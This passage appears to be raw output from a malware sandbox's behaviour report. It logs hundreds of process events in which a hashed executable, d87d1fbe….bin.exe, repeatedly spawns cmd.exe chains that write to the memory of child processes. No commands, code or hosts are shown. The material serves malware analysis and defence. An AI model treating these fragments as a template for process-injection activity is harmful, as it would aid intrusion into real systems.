PID 916 wrote to memory of 1904 916 cmd.exe 651 PID 916 wrote to memory of 1904 916 cmd.exe 651 PID 1904 wrote to memory of 1416 1904 cmd.exe 652 PID 1904 wrote to memory of 1416 1904 cmd.exe 652 PID 1904 wrote to memory of 1416 1904 cmd.exe 652 PID 1904 wrote to memory of 1416 1904 cmd.exe 652 PID 916 wrote to memory of 940 916 cmd.exe 653 PID 916 wrote to memory of 940 916 cmd.exe 653 PID 916 wrote to memory of 940 916 cmd.exe 653 PID 916 wrote to memory of 940 916 cmd.exe 653 PID 1116 wrote to memory of 1816 1116 d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe 654 PID 1116 wrote to memory of 1816 1116 d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe 654 PID 1116 wrote to memory of 1816 1116 d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe 654 PID 1116 wrote to memory of 1816 1116 d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe 654 PID 1816 wrote to memory of 864 1816 cmd.exe 656 PID 1816 wrote to memory of 864 1816 cmd.exe 656 PID 1816 wrote to memory of 864 1816 cmd.exe 656 PID 1816 wrote to memory of 864 1816 cmd.exe 656 PID 1816 wrote to memory of 1912 1816 cmd.exe 657 PID 1816 wrote to memory of 1912 1816 cmd.exe 657 PID 1816 wrote to memory of 1912 1816 cmd.exe 657 PID 1816 wrote to memory of 1912 1816 cmd.exe 657 PID 1816 wrote to memory of 1808 1816 cmd.exe 658 PID 1816 wrote to memory of 1808 1816 cmd.exe 658 PID 1816 wrote to memory of 1808 1816 cmd.exe 658 PID 1816 wrote to memory of 1808 1816 cmd.exe 658 PID 1808 wrote to memory of 296 1808 cmd.exe 659 PID 1808 wrote to memory of 296 1808 cmd.exe 659 PID 1808 wrote to memory of 296 1808 cmd.exe 659 PID 1808 wrote to memory of 296 1808 cmd.exe 659 PID 1816 wrote to memory of 900 1816 cmd.exe 660 PID 1816 wrote to memory of 900 1816 cmd.exe 660 PID 1816 wrote to memory of 900 1816 cmd.exe 660 PID 1816 wrote to memory of 900 1816 cmd.exe 660 PID 1116 wrote to memory of 208 1116 d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe 661 PID 1116 wrote to memory of 208 1116 d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe 661 PID 1116 wrote to memory of 208 1116 d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe 661 PID 1116 wrote to memory of 208 1116 d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe 661 PID 208 wrote to memory of 1204 208 cmd.exe 663 PID 208 wrote to memory of 1204 208 cmd.exe 663 PID 208 wrote to memory of 1204 208 cmd.exe 663 PID 208 wrote to memory of 1204 208 cmd.exe 663 PID 208 wrote to memory of 1108 208 cmd.exe 664 PID 208 wrote to memory of 1108 208 cmd.exe 664 PID 208 wrote to memory of 1108 208 cmd.exe 664 PID 208 wrote to memory of 1108 208 cmd.exe 664 PID 208 wrote to memory of 756 208 cmd.exe 665 PID 208 wrote to memory of 756 208 cmd.exe 665 PID 208 wrote to memory of 756 208 cmd.exe 665 PID 208 wrote to memory of 756 208 cmd.exe 665 PID 756 wrote to memory of 896 756 cmd.exe 666 PID 756 wrote to memory of 896 756 cmd.exe 666 PID 756 wrote to memory of 896 756 cmd.exe 666 PID 756 wrote to memory of 896 756 cmd.exe 666 PID 208 wrote to memory of 1780 208 cmd.exe 667 PID 208 wrote to memory of 1780 208 cmd.exe 667 PID 208 wrote to memory of 1780 208 cmd.exe 667 PID 208 wrote to memory of 1780 208 cmd.exe 667 PID 1116 wrote to memory of 212 1116 d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe 668 PID 1116 wrote to memory of 212 1116 d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe 668 PID 1116 wrote to memory of 212 1116 d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe 668 PID 1116 wrote to memory of 212 1116 d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe 668 PID 212 wrote to memory of 1080 212 cmd.exe 670 PID 212 wrote to memory of 1080 212 cmd.exe 670 PID 212 wrote to memory of 1080 212 cmd.exe 670 PID 212 wrote to memory of 1080 212 cmd.exe 670 PID 212 wrote to memory of 1376 212 cmd.exe 671 PID 212 wrote to memory of 1376 212 cmd.exe 671 PID 212 wrote to memory of 1376 212 cmd.exe 671 PID 212 wrote to memory of 1376 212 cmd.exe 671 PID 212 wrote to memory of 1512 212 cmd.exe 672 PID 212 wrote to memory of 1512 212 cmd.exe 672 PID 212 wrote to memory of 1512 212 cmd.exe 672 PID 212 wrote to memory of 1512 212 cmd.exe 672 PID 1512 wrote to memory of 940 1512 cmd.exe 673 PID 1512 wrote to memory of 940 1512 cmd.exe 673 PID 1512 wrote to memory of 940 1512 cmd.exe 673 PID 1512 wrote to memory of 940 1512 cmd.exe 673 PID 212 wrote to memory of 944 212 cmd.exe 674 PID 212 wrote to memory of 944 212 cmd.exe 674 PID 212 wrote to memory of 944 212 cmd.exe 674 PID 212 wrote to memory of 944 212 cmd.exe 674 PID 1116 wrote to memory of 1960 1116 d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe 675 PID 1116 wrote to memory of 1960 1116 d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe 675 PID 1116 wrote to memory of 1960 1116 d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe 675 PID 1116 wrote to memory of 1960 1116 d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe 675 PID 1960 wrote to memory of 292 1960 cmd.exe 677 PID 1960 wrote to memory of 292 1960 cmd.exe 677 PID 1960 wrote to memory of 292 1960 cmd.exe 677 PID 1960 wrote to memory of 292 1960 cmd.exe 677 PID 1960 wrote to memory of 1820 1960 cmd.exe 678 PID 1960 wrote to memory of 1820 1960 cmd.exe 678 PID 1960 wrote to memory of 1820 1960 cmd.exe 678 PID 1960 wrote to memory of 1820 1960 cmd.exe 678 PID 1960 wrote to memory of 1808 1960 cmd.exe 679 PID 1960 wrote to memory of 1808 1960 cmd.exe 679 PID 1960 wrote to memory of 1808 1960 cmd.exe 679 PID 1960 wrote to memory of 1808 1960 cmd.exe 679 PID 1808 wrote to memory of 548 1808 cmd.exe 680 PID 1808 wrote to memory of 548 1808 cmd.exe 680 PID 1808 wrote to memory of 548 1808 cmd.exe 680 PID 1808 wrote to memory of 548 1808 cmd.exe 680 PID 1960 wrote to memory of 1804 1960 cmd.exe 681 PID 1960 wrote to memory of 1804 1960 cmd.exe 681 PID 1960 wrote to memory of 1804 1960 cmd.exe 681 PID 1960 wrote to memory of 1804 1960 cmd.exe 681 PID 1116 wrote to memory of 1752 1116 d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe 682 PID 1116 wrote to memory of 1752 1116 d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe 682 PID 1116 wrote to memory of 1752 1116 d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe 682 PID 1116 wrote to memory of 1752 1116 d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe 682 PID 1752 wrote to memory of 1108 1752 cmd.exe 684 PID 1752 wrote to memory of 1108 1752 cmd.exe 684 PID 1752 wrote to memory of 1108 1752 cmd.exe 684 PID 1752 wrote to memory of 1108 1752 cmd.exe 684 PID 1752 wrote to memory of 1936 1752 cmd.exe 685 PID 1752 wrote to memory of 1936 1752 cmd.exe 685 PID 1752 wrote to memory of 1936 1752 cmd.exe 685 PID 1752 wrote to memory of 1936 1752 cmd.exe 685 PID 1752 wrote to memory of 1168 1752 cmd.exe 686 PID 1752 wrote to memory of 1168 1752 cmd.exe 686 PID 1752 wrote to memory of 1168 1752 cmd.exe 686 PID 1752 wrote to memory of 1168 1752 cmd.exe 686 PID 1168 wrote to memory of 1324 1168 cmd.exe 687 PID 1168 wrote to memory of 1324 1168 cmd.exe 687 PID 1168 wrote to memory of 1324 1168 cmd.exe 687 PID 1168 wrote to memory of 1324 1168 cmd.exe 687 PID 1752 wrote to memory of 972 1752 cmd.exe 688 PID 1752 wrote to memory of 972 1752 cmd.exe 688 PID 1752 wrote to memory of 972 1752 cmd.exe 688 PID 1752 wrote to memory of 972 1752 cmd.exe 688 PID 1116 wrote to memory of 1344 1116 d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe 689 PID 1116 wrote to memory of 1344 1116 d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe 689 PID 1116 wrote to memory of 1344 1116 d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe 689 PID 1116 wrote to memory of 1344 1116 d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe 689 PID 1344 wrote to memory of 916 1344 cmd.exe 691 PID 1344 wrote to memory of 916 1344 cmd.exe 691 PID 1344 wrote to memory of 916 1344 cmd.exe 691 PID 1344 wrote to memory of 916 1344 cmd.exe 691 PID 1344 wrote to memory of 968 1344 cmd.exe 692 PID 1344 wrote to memory of 968 1344 cmd.exe 692 PID 1344 wrote to memory of 968 1344 cmd.exe 692 PID 1344 wrote to memory of 968 1344 cmd.exe 692 PID 1344 wrote to memory of 1236 1344 cmd.exe 693 PID 1344 wrote to memory of 1236 1344 cmd.exe 693 PID 1344 wrote to memory of 1236 1344 cmd.exe 693 PID 1344 wrote to memory of 1236 1344 cmd.exe 693 PID 1236 wrote to memory of 236 1236 cmd.exe 694 PID 1236 wrote to memory of 236 1236 cmd.exe 694 PID 1236 wrote to memory of 236 1236 cmd.exe 694 PID 1236 wrote to memory of 236 1236 cmd.exe 694 PID 1344 wrote to memory of 228 1344 cmd.exe 695 PID 1344 wrote to memory of 228 1344 cmd.exe 695 PID 1344 wrote to memory of 228 1344 cmd.exe 695 PID 1344 wrote to memory of 228 1344 cmd.exe 695 PID 1116 wrote to memory of 1424 1116 d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe 696 PID 1116 wrote to memory of 1424 1116 d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe 696 PID 1116 wrote to memory of 1424 1116 d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe 696 PID 1116 wrote to memory of 1424 1116 d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe 696 PID 1424 wrote to memory of 900 1424 cmd.exe 698 PID 1424 wrote to memory of 900 1424 cmd.exe 698 PID 1424 wrote to memory of 900 1424 cmd.exe 698 PID 1424 wrote to memory of 900 1424 cmd.exe 698 PID 1424 wrote to memory of 548 1424 cmd.exe 699 PID 1424 wrote to memory of 548 1424 cmd.exe 699 PID 1424 wrote to memory of 548 1424 cmd.exe 699 PID 1424 wrote to memory of 548 1424 cmd.exe 699 PID 1424 wrote to memory of 1952 1424 cmd.exe 700 PID 1424 wrote to memory of 1952 1424 cmd.exe 700 PID 1424 wrote to memory of 1952 1424 cmd.exe 700 PID 1424 wrote to memory of 1952 1424 cmd.exe 700 PID 1952 wrote to memory of 1804 1952 cmd.exe 701 PID 1952 wrote to memory of 1804 1952 cmd.exe 701 PID 1952 wrote to memory of 1804 1952 cmd.exe 701 PID 1952 wrote to memory of 1804 1952 cmd.exe 701 PID 1424 wrote to memory of 216 1424 cmd.exe 702 PID 1424 wrote to memory of 216 1424 cmd.exe 702 PID 1424 wrote to memory of 216 1424 cmd.exe 702 PID 1424 wrote to memory of 216 1424 cmd.exe 702 PID 1116 wrote to memory of 1372 1116 d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe 703 PID 1116 wrote to memory of 1372 1116 d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe 703 PID 1116 wrote to memory of 1372 1116 d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe 703 PID 1116 wrote to memory of 1372 1116 d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe 703 PID 1372 wrote to memory of 524 1372 cmd.exe 705 PID 1372 wrote to memory of 524 1372 cmd.exe 705 PID 1372 wrote to memory of 524 1372 cmd.exe 705 PID 1372 wrote to memory of 524 1372 cmd.exe 705 PID 1372 wrote to memory of 1324 1372 cmd.exe 706 PID 1372 wrote to memory of 1324 1372 cmd.exe 706 PID 1372 wrote to memory of 1324 1372 cmd.exe 706 PID 1372 wrote to memory of 1324 1372 cmd.exe 706 PID 1372 wrote to memory of 208 1372 cmd.exe 707 PID 1372 wrote to memory of 208 1372 cmd.exe 707 PID 1372 wrote to memory of 208 1372 cmd.exe 707 PID 1372 wrote to memory of 208 1372 cmd.exe 707 PID 208 wrote to memory of 1028 208 cmd.exe 708 PID 208 wrote to memory of 1028 208 cmd.exe 708 PID 208 wrote to memory of 1028 208 cmd.exe 708 PID 208 wrote to memory of 1028 208 cmd.exe 708 PID 1372 wrote to memory of 280 1372 cmd.exe 709 PID 1372 wrote to memory of 280 1372 cmd.exe 709 PID 1372 wrote to memory of 280 1372 cmd.exe 709 PID 1372 wrote to memory of 280 1372 cmd.exe 709 PID 1116 wrote to memory of 940 1116 d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe 710 PID 1116 wrote to memory of 940 1116 d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe 710 PID 1116 wrote to memory of 940 1116 d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe 710 PID 1116 wrote to memory of 940 1116 d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe 710 PID 940 wrote to memory of 928 940 cmd.exe 712 PID 940 wrote to memory of 928 940 cmd.exe 712 PID 940 wrote to memory of 928 940 cmd.exe 712 PID 940 wrote to memory of 928 940 cmd.exe 712 PID 940 wrote to memory of 236 940 cmd.exe 713 PID 940 wrote to memory of 236 940 cmd.exe 713 PID 940 wrote to memory of 236 940 cmd.exe 713 PID 940 wrote to memory of 236 940 cmd.exe 713 PID 940 wrote to memory of 864 940 cmd.exe 714 PID 940 wrote to memory of 864 940 cmd.exe 714 PID 940 wrote to memory of 864 940 cmd.exe 714 PID 940 wrote to memory of 864 940 cmd.exe 714 PID 864 wrote to memory of 228 864 cmd.exe 715 PID 864 wrote to memory of 228 864 cmd.exe 715 PID 864 wrote to memory of 228 864 cmd.exe 715 PID 864 wrote to memory of 228 864 cmd.exe 715 PID 940 wrote to memory of 1376 940 cmd.exe 716 PID 940 wrote to memory of 1376 940 cmd.exe 716 PID 940 wrote to memory of 1376 940 cmd.exe 716 PID 940 wrote to memory of 1376 940 cmd.exe 716 PID 1116 wrote to memory of 1404 1116 d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe 717 PID 1116 wrote to memory of 1404 1116 d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe 717 PID 1116 wrote to memory of 1404 1116 d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe 717 PID 1116 wrote to memory of 1404 1116 d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe 717 PID 1404 wrote to memory of 1912 1404 cmd.exe 719 PID 1404 wrote to memory of 1912 1404 cmd.exe 719 PID 1404 wrote to memory of 1912 1404 cmd.exe 719 PID 1404 wrote to memory of 1912 1404 cmd.exe 719 PID 1404 wrote to memory of 1804 1404 cmd.exe 720 PID 1404 wrote to memory of 1804 1404 cmd.exe 720 PID 1404 wrote to memory of 1804 1404 cmd.exe 720 PID 1404 wrote to memory of 1804 1404 cmd.exe 720 PID 1404 wrote to memory of 220 1404 cmd.exe 721 PID 1404 wrote to memory of 220 1404 cmd.exe 721 PID 1404 wrote to memory of 220 1404 cmd.exe 721 PID 1404 wrote to memory of 220 1404 cmd.exe 721 PID 220 wrote to memory of 680 220 cmd.exe 722 PID 220 wrote to memory of 680 220 cmd.exe 722 PID 220 wrote to memory of 680 220 cmd.exe 722 PID 220 wrote to memory of 680 220 cmd.exe 722 PID 1404 wrote to memory of 232 1404 cmd.exe 723 PID 1404 wrote to memory of 232 1404 cmd.exe 723 PID 1404 wrote to memory of 232 1404 cmd.exe 723 PID 1404 wrote to memory of 232 1404 cmd.exe 723 PID 1116 wrote to memory of 1756 1116 d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe 724 PID 1116 wrote to memory of 1756 1116 d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe 724 PID 1116 wrote to memory of 1756 1116 d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe 724 PID 1116 wrote to memory of 1756 1116 d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe 724 PID 1756 wrote to memory of 1876 1756 cmd.exe 726 PID 1756 wrote to memory of 1876 1756 cmd.exe 726 PID 1756 wrote to memory of 1876 1756 cmd.exe 726 PID 1756 wrote to memory of 1876 1756 cmd.exe 726 PID 1756 wrote to memory of 1028 1756 cmd.exe 727 PID 1756 wrote to memory of 1028 1756 cmd.exe 727 PID 1756 wrote to memory of 1028 1756 cmd.exe 727 PID 1756 wrote to memory of 1028 1756 cmd.exe 727 PID 1756 wrote to memory of 1260 1756 cmd.exe 728 PID 1756 wrote to memory of 1260 1756 cmd.exe 728 PID 1756 wrote to memory of 1260 1756 cmd.exe 728 PID 1756 wrote to memory of 1260 1756 cmd.exe 728 PID 1260 wrote to memory of 1752 1260 cmd.exe 729 PID 1260 wrote to memory of 1752 1260 cmd.exe 729 PID 1260 wrote to memory of 1752 1260 cmd.exe 729 PID 1260 wrote to memory of 1752 1260 cmd.exe 729 PID 1756 wrote to memory of 1468 1756 cmd.exe 730 PID 1756 wrote to memory of 1468 1756 cmd.exe 730 PID 1756 wrote to memory of 1468 1756 cmd.exe 730 PID 1756 wrote to memory of 1468 1756 cmd.exe 730 PID 1116 wrote to memory of 944 1116 d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe 731 PID 1116 wrote to memory of 944 1116 d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe 731 PID 1116 wrote to memory of 944 1116 d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe 731 PID 1116 wrote to memory of 944 1116 d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe 731 PID 944 wrote to memory of 848 944 cmd.exe 733 PID 944 wrote to memory of 848 944 cmd.exe 733 PID 944 wrote to memory of 848 944 cmd.exe 733 PID 944 wrote to memory of 848 944 cmd.exe 733 PID 944 wrote to memory of 228 944 cmd.exe 734 PID 944 wrote to memory of 228 944 cmd.exe 734 PID 944 wrote to memory of 228 944 cmd.exe 734 PID 944 wrote to memory of 228 944 cmd.exe 734 PID 944 wrote to memory of 292 944 cmd.exe 735 PID 944 wrote to memory of 292 944 cmd.exe 735 PID 944 wrote to memory of 292 944 cmd.exe 735 PID 944 wrote to memory of 292 944 cmd.exe 735 PID 292 wrote to memory of 1416 292 cmd.exe 736 PID 292 wrote to memory of 1416 292 cmd.exe 736 PID 292 wrote to memory of 1416 292 cmd.exe 736 PID 292 wrote to memory of 1416 292 cmd.exe 736 PID 944 wrote to memory of 968 944 cmd.exe 737 PID 944 wrote to memory of 968 944 cmd.exe 737 PID 944 wrote to memory of 968 944 cmd.exe 737 PID 944 wrote to memory of 968 944 cmd.exe 737 PID 1116 wrote to memory of 1960 1116 d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe 738 PID 1116 wrote to memory of 1960 1116 d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe 738 PID 1116 wrote to memory of 1960 1116 d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe 738 PID 1116 wrote to memory of 1960 1116 d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe 738 PID 1960 wrote to memory of 1820 1960 cmd.exe 740 PID 1960 wrote to memory of 1820 1960 cmd.exe 740 PID 1960 wrote to memory of 1820 1960 cmd.exe 740 PID 1960 wrote to memory of 1820 1960 cmd.exe 740 PID 1960 wrote to memory of 680 1960 cmd.exe 741 PID 1960 wrote to memory of 680 1960 cmd.exe 741 PID 1960 wrote to memory of 680 1960 cmd.exe 741 PID 1960 wrote to memory of 680 1960 cmd.exe 741 PID 1960 wrote to memory of 1108 1960 cmd.exe 742 PID 1960 wrote to memory of 1108 1960 cmd.exe 742 PID 1960 wrote to memory of 1108 1960 cmd.exe 742 PID 1960 wrote to memory of 1108 1960 cmd.exe 742 PID 1108 wrote to memory of 232 1108 cmd.exe 743 PID 1108 wrote to memory of 232 1108 cmd.exe 743 PID 1108 wrote to memory of 232 1108 cmd.exe 743 PID 1108 wrote to memory of 232 1108 cmd.exe 743 PID 1960 wrote to memory of 1808 1960 cmd.exe 744 PID 1960 wrote to memory of 1808 1960 cmd.exe 744 PID 1960 wrote to memory of 1808 1960 cmd.exe 744 PID 1960 wrote to memory of 1808 1960 cmd.exe 744 PID 1116 wrote to memory of 972 1116 d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe 745 PID 1116 wrote to memory of 972 1116 d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe 745 PID 1116 wrote to memory of 972 1116 d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe 745 PID 1116 wrote to memory of 972 1116 d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe 745 PID 972 wrote to memory of 1936 972 cmd.exe 747 PID 972 wrote to memory of 1936 972 cmd.exe 747 PID 972 wrote to memory of 1936 972 cmd.exe 747 PID 972 wrote to memory of 1936 972 cmd.exe 747 PID 972 wrote to memory of 1752 972 cmd.exe 748 PID 972 wrote to memory of 1752 972 cmd.exe 748 PID 972 wrote to memory of 1752 972 cmd.exe 748 PID 972 wrote to memory of 1752 972 cmd.exe 748 PID 972 wrote to memory of 916 972 cmd.exe 749 PID 972 wrote to memory of 916 972 cmd.exe 749 PID 972 wrote to memory of 916 972 cmd.exe 749 PID 972 wrote to memory of 916 972 cmd.exe 749 PID 916 wrote to memory of 1372 916 cmd.exe 750 PID 916 wrote to memory of 1372 916 cmd.exe 750 PID 916 wrote to memory of 1372 916 cmd.exe 750 PID 916 wrote to memory of 1372 916 cmd.exe 750 PID 972 wrote to memory of 1324 972 cmd.exe 751 PID 972 wrote to memory of 1324 972 cmd.exe 751 PID 972 wrote to memory of 1324 972 cmd.exe 751 PID 972 wrote to memory of 1324 972 cmd.exe 751 PID 1116 wrote to memory of 1080 1116 d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe 752 PID 1116 wrote to memory of 1080 1116 d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe 752 PID 1116 wrote to memory of 1080 1116 d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe 752 PID 1116 wrote to memory of 1080 1116 d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe 752 PID 1080 wrote to memory of 1580 1080 cmd.exe 754 PID 1080 wrote to memory of 1580 1080 cmd.exe 754 PID 1080 wrote to memory of 1580 1080 cmd.exe 754 PID 1080 wrote to memory of 1580 1080 cmd.exe 754 PID 1080 wrote to memory of 1416 1080 cmd.exe 755 PID 1080 wrote to memory of 1416 1080 cmd.exe 755 PID 1080 wrote to memory of 1416 1080 cmd.exe 755 PID 1080 wrote to memory of 1416 1080 cmd.exe 755 PID 1080 wrote to memory of 380 1080 cmd.exe 756 PID 1080 wrote to memory of 380 1080 cmd.exe 756 PID 1080 wrote to memory of 380 1080 cmd.exe 756 PID 1080 wrote to memory of 380 1080 cmd.exe 756 PID 380 wrote to memory of 968 380 cmd.exe 757 PID 380 wrote to memory of 968 380 cmd.exe 757 PID 380 wrote to memory of 968 380 cmd.exe 757 PID 380 wrote to memory of 968 380 cmd.exe 757 PID 1080 wrote to memory of 236 1080 cmd.exe 758 PID 1080 wrote to memory of 236 1080 cmd.exe 758 PID 1080 wrote to memory of 236 1080 cmd.exe 758 PID 1080 wrote to memory of 236 1080 cmd.exe 758 PID 1116 wrote to memory of 216 1116 d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe 759 PID 1116 wrote to memory of 216 1116 d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe 759 PID 1116 wrote to memory of 216 1116 d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe 759 PID 1116 wrote to memory of 216 1116 d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe 759 PID 216 wrote to memory of 1404 216 cmd.exe 761 PID 216 wrote to memory of 1404 216 cmd.exe 761 PID 216 wrote to memory of 1404 216 cmd.exe 761 PID 216 wrote to memory of 1404 216 cmd.exe 761 PID 216 wrote to memory of 232 216 cmd.exe 762 PID 216 wrote to memory of 232 216 cmd.exe 762 PID 216 wrote to memory of 232 216 cmd.exe 762 PID 216 wrote to memory of 232 216 cmd.exe 762 PID 216 wrote to memory of 756 216 cmd.exe 763 PID 216 wrote to memory of 756 216 cmd.exe 763 PID 216 wrote to memory of 756 216 cmd.exe 763 PID 216 wrote to memory of 756 216 cmd.exe 763 PID 756 wrote to memory of 1800 756 cmd.exe 764 PID 756 wrote to memory of 1800 756 cmd.exe 764 PID 756 wrote to memory of 1800 756 cmd.exe 764 PID 756 wrote to memory of 1800 756 cmd.exe 764 PID 216 wrote to memory of 1804 216 cmd.exe 765 PID 216 wrote to memory of 1804 216 cmd.exe 765 PID 216 wrote to memory of 1804 216 cmd.exe 765 PID 216 wrote to memory of 1804 216 cmd.exe 765 PID 1116 wrote to memory of 1096 1116 d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe 766 PID 1116 wrote to memory of 1096 1116 d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe 766 PID 1116 wrote to memory of 1096 1116 d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe 766 PID 1116 wrote to memory of 1096 1116 d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe 766 PID 1096 wrote to memory of 1780 1096 cmd.exe 768 PID 1096 wrote to memory of 1780 1096 cmd.exe 768 PID 1096 wrote to memory of 1780 1096 cmd.exe 768 PID 1096 wrote to memory of 1780 1096 cmd.exe 768 PID 1096 wrote to memory of 1372 1096 cmd.exe 769 PID 1096 wrote to memory of 1372 1096 cmd.exe 769 PID 1096 wrote to memory of 1372 1096 cmd.exe 769 PID 1096 wrote to memory of 1372 1096 cmd.exe 769 PID 1096 wrote to memory of 928 1096 cmd.exe 770 PID 1096 wrote to memory of 928 1096 cmd.exe 770 PID 1096 wrote to memory of 928 1096 cmd.exe 770 PID 1096 wrote to memory of 928 1096 cmd.exe 770 PID 928 wrote to memory of 1168 928 cmd.exe 771 PID 928 wrote to memory of 1168 928 cmd.exe 771 PID 928 wrote to memory of 1168 928 cmd.exe 771 PID 928 wrote to memory of 1168 928 cmd.exe 771 PID 1096 wrote to memory of 1028 1096 cmd.exe 772 PID 1096 wrote to memory of 1028 1096 cmd.exe 772 PID 1096 wrote to memory of 1028 1096 cmd.exe 772 PID 1096 wrote to memory of 1028 1096 cmd.exe 772 PID 1116 wrote to memory of 1376 1116 d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe 773 PID 1116 wrote to memory of 1376 1116 d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe 773 PID 1116 wrote to memory of 1376 1116 